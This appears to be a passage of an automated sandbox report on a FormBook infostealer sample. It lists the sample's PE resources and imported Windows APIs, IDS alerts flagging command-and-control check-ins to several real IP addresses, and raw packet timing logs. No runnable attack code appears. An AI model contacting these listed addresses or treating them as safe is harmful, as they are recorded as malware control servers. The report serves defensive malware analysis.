RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                      USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                      GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                      COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
                      ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                      SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                      ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                      OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                      Language of compilation system | Country where language is spoken
                      English | Great Britain
                      English | United States
                      Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                      2024-09-22T18:02:25.044941+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49736 | 54.179.173.60 | 80 | TCP
                      2024-09-22T18:02:49.600999+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49741 | 206.119.82.147 | 80 | TCP
                      2024-09-22T18:03:03.365570+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49745 | 81.88.63.46 | 80 | TCP
                      2024-09-22T18:03:16.780789+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49749 | 67.223.117.189 | 80 | TCP
                      2024-09-22T18:03:30.374979+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49753 | 85.159.66.93 | 80 | TCP
                      2024-09-22T18:03:59.827293+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49757 | 208.91.197.27 | 80 | TCP
                      2024-09-22T18:04:19.036132+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49761 | 195.161.68.8 | 80 | TCP
                      2024-09-22T18:04:32.644463+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49765 | 194.58.112.174 | 80 | TCP
                      Sep 22, 2024 18:03:16.870441914 CEST804974967.223.117.189192.168.2.4
                      Sep 22, 2024 18:03:16.870474100 CEST4974980192.168.2.467.223.117.189
                      Sep 22, 2024 18:03:16.871334076 CEST804974967.223.117.189192.168.2.4
                      Sep 22, 2024 18:03:16.871346951 CEST804974967.223.117.189192.168.2.4
                      Sep 22, 2024 18:03:16.871398926 CEST4974980192.168.2.467.223.117.189
                      Sep 22, 2024 18:03:16.872363091 CEST804974967.223.117.189192.168.2.4
                      Sep 22, 2024 18:03:16.872375965 CEST804974967.223.117.189192.168.2.4
                      Sep 22, 2024 18:03:16.872396946 CEST4974980192.168.2.467.223.117.189
                      Sep 22, 2024 18:03:16.873404980 CEST804974967.223.117.189192.168.2.4
                      Sep 22, 2024 18:03:16.873416901 CEST804974967.223.117.189192.168.2.4
                      Sep 22, 2024 18:03:16.873440027 CEST4974980192.168.2.467.223.117.189
                      Sep 22, 2024 18:03:16.874418020 CEST804974967.223.117.189192.168.2.4
                      Sep 22, 2024 18:03:16.874430895 CEST804974967.223.117.189192.168.2.4
                      Sep 22, 2024 18:03:16.874454021 CEST4974980192.168.2.467.223.117.189
                      Sep 22, 2024 18:03:16.875415087 CEST804974967.223.117.189192.168.2.4
                      Sep 22, 2024 18:03:16.875430107 CEST804974967.223.117.189192.168.2.4
                      Sep 22, 2024 18:03:16.875442028 CEST804974967.223.117.189192.168.2.4
                      Sep 22, 2024 18:03:16.875448942 CEST4974980192.168.2.467.223.117.189
                      Sep 22, 2024 18:03:16.875478983 CEST4974980192.168.2.467.223.117.189
                      Sep 22, 2024 18:03:16.879136086 CEST4974980192.168.2.467.223.117.189
                      Sep 22, 2024 18:03:16.883846045 CEST804974967.223.117.189192.168.2.4
                      Sep 22, 2024 18:03:21.983731031 CEST4975080192.168.2.485.159.66.93
                      Sep 22, 2024 18:03:21.988624096 CEST804975085.159.66.93192.168.2.4
                      Sep 22, 2024 18:03:21.988688946 CEST4975080192.168.2.485.159.66.93
                      Sep 22, 2024 18:03:21.999027014 CEST4975080192.168.2.485.159.66.93
                      Sep 22, 2024 18:03:22.004295111 CEST804975085.159.66.93192.168.2.4
                      Sep 22, 2024 18:03:23.513914108 CEST4975080192.168.2.485.159.66.93
                      Sep 22, 2024 18:03:23.519664049 CEST804975085.159.66.93192.168.2.4
                      Sep 22, 2024 18:03:23.519900084 CEST4975080192.168.2.485.159.66.93
                      Sep 22, 2024 18:03:24.531658888 CEST4975180192.168.2.485.159.66.93
                      Sep 22, 2024 18:03:24.536592960 CEST804975185.159.66.93192.168.2.4
                      Sep 22, 2024 18:03:24.536669016 CEST4975180192.168.2.485.159.66.93
                      Sep 22, 2024 18:03:24.548738956 CEST4975180192.168.2.485.159.66.93
                      Sep 22, 2024 18:03:24.553668976 CEST804975185.159.66.93192.168.2.4
                      Sep 22, 2024 18:03:26.059156895 CEST4975180192.168.2.485.159.66.93
                      Sep 22, 2024 18:03:26.064434052 CEST804975185.159.66.93192.168.2.4
                      Sep 22, 2024 18:03:26.064486027 CEST4975180192.168.2.485.159.66.93
                      Sep 22, 2024 18:03:27.077610970 CEST4975280192.168.2.485.159.66.93
                      Sep 22, 2024 18:03:27.082577944 CEST804975285.159.66.93192.168.2.4
                      Sep 22, 2024 18:03:27.087019920 CEST4975280192.168.2.485.159.66.93
                      Sep 22, 2024 18:03:27.098366976 CEST4975280192.168.2.485.159.66.93
                      Sep 22, 2024 18:03:27.103296995 CEST804975285.159.66.93192.168.2.4
                      Sep 22, 2024 18:03:27.103305101 CEST804975285.159.66.93192.168.2.4
                      Sep 22, 2024 18:03:27.103322983 CEST804975285.159.66.93192.168.2.4
                      Sep 22, 2024 18:03:27.103327036 CEST804975285.159.66.93192.168.2.4
                      Sep 22, 2024 18:03:27.103331089 CEST804975285.159.66.93192.168.2.4
                      Sep 22, 2024 18:03:27.103465080 CEST804975285.159.66.93192.168.2.4
                      Sep 22, 2024 18:03:27.103468895 CEST804975285.159.66.93192.168.2.4
                      Sep 22, 2024 18:03:27.103513002 CEST804975285.159.66.93192.168.2.4
                      Sep 22, 2024 18:03:27.103518009 CEST804975285.159.66.93192.168.2.4
                      Sep 22, 2024 18:03:28.605875015 CEST4975280192.168.2.485.159.66.93
                      Sep 22, 2024 18:03:28.611433029 CEST804975285.159.66.93192.168.2.4
                      Sep 22, 2024 18:03:28.611831903 CEST4975280192.168.2.485.159.66.93
                      Sep 22, 2024 18:03:29.624526978 CEST4975380192.168.2.485.159.66.93
                      Sep 22, 2024 18:03:29.631258011 CEST804975385.159.66.93192.168.2.4
                      Sep 22, 2024 18:03:29.631664991 CEST4975380192.168.2.485.159.66.93
                      Sep 22, 2024 18:03:29.638155937 CEST4975380192.168.2.485.159.66.93
                      Sep 22, 2024 18:03:29.643013000 CEST804975385.159.66.93192.168.2.4
                      Sep 22, 2024 18:03:30.374783039 CEST804975385.159.66.93192.168.2.4
                      Sep 22, 2024 18:03:30.374808073 CEST804975385.159.66.93192.168.2.4
                      Sep 22, 2024 18:03:30.374979019 CEST4975380192.168.2.485.159.66.93
                      Sep 22, 2024 18:03:30.378204107 CEST4975380192.168.2.485.159.66.93
                      Sep 22, 2024 18:03:30.383014917 CEST804975385.159.66.93192.168.2.4
                      Sep 22, 2024 18:03:35.681361914 CEST4975480192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:35.686258078 CEST8049754208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:35.687969923 CEST4975480192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:35.697856903 CEST4975480192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:35.702721119 CEST8049754208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:36.212583065 CEST8049754208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:36.212640047 CEST4975480192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:37.201997042 CEST4975480192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:37.208246946 CEST8049754208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:38.219106913 CEST4975580192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:38.224162102 CEST8049755208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:38.224239111 CEST4975580192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:38.236916065 CEST4975580192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:38.241770983 CEST8049755208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:38.778795004 CEST8049755208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:38.778876066 CEST4975580192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:39.750215054 CEST4975580192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:39.755253077 CEST8049755208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:40.765402079 CEST4975680192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:40.770468950 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:40.770575047 CEST4975680192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:40.783293962 CEST4975680192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:40.788301945 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:40.788311005 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:40.788333893 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:40.788337946 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:40.788409948 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:40.788419962 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:40.788448095 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:40.788451910 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:40.788574934 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:41.308537960 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:41.308651924 CEST4975680192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:42.293414116 CEST4975680192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:42.298356056 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:43.312005043 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:43.316934109 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:43.317135096 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:43.325685978 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:43.330526114 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.826951027 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.827187061 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.827228069 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.827292919 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.827982903 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.828035116 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.828171968 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.828921080 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.829050064 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.869522095 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.869647980 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.869688034 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.869719982 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.870237112 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.870275974 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.870296001 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.870312929 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.870362043 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.912373066 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.912512064 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.912647009 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.914170980 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.914447069 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.914483070 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.914508104 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.915319920 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.915378094 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.955336094 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.955579042 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.955616951 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.955636024 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.956376076 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.956425905 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.956444025 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.996479988 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.997827053 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.997934103 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.998038054 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.998071909 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.998509884 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.998564005 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.998583078 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.998619080 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.998661995 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.999614954 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.040656090 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.040725946 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:00.040800095 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.040817976 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.040860891 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:00.041524887 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.041695118 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.041742086 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:00.042090893 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.042104959 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.042126894 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.042161942 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:00.042857885 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.042901993 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:00.083365917 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.083484888 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.083523989 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.083561897 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:00.084067106 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.084098101 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.084136963 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:00.084626913 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.084665060 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.084685087 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:00.085575104 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.085591078 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.085623980 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:00.137098074 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:00.320602894 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.320738077 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.320750952 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.320874929 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:00.321266890 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.321317911 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:04.881823063 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:04.881859064 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:04.882123947 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:04.887233019 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:04.892035007 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:10.475509882 CEST4975880192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:10.480351925 CEST8049758195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:10.480412960 CEST4975880192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:10.490864038 CEST4975880192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:10.495795965 CEST8049758195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:11.273576975 CEST8049758195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:11.273637056 CEST8049758195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:11.275460958 CEST4975880192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:11.996570110 CEST4975880192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:13.019972086 CEST4975980192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:13.033032894 CEST8049759195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:13.034755945 CEST4975980192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:13.046003103 CEST4975980192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:13.052890062 CEST8049759195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:13.853189945 CEST8049759195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:13.853341103 CEST8049759195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:13.853512049 CEST4975980192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:14.559190035 CEST4975980192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:15.579989910 CEST4976080192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:15.585352898 CEST8049760195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:15.586123943 CEST4976080192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:15.598016024 CEST4976080192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:15.610426903 CEST8049760195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:15.610440969 CEST8049760195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:15.610450983 CEST8049760195.161.68.8192.168.2.4
